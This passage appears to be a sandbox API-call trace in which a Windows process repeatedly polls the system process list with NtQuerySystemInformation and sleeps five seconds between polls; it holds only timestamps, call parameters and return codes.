SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.767] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.767] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.767] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.772] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.773] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.776] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.776] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.780] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.781] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.784] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.784] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.790] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.792] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.792] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.793] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.798] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.800] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.800] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.800] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.801] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.808] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.809] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.809] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.810] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.815] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.816] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.818] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.818] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.819] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.824] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.827] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.828] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.828] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.833] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.844] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.847] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.908] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.915] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.923] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.924] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.928] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.934] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.935] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.936] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.936] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.940] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.942] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.942] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.946] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.948] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.948] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.961] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.972] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0213.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0213.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0213.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0213.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0213.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0213.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.980] 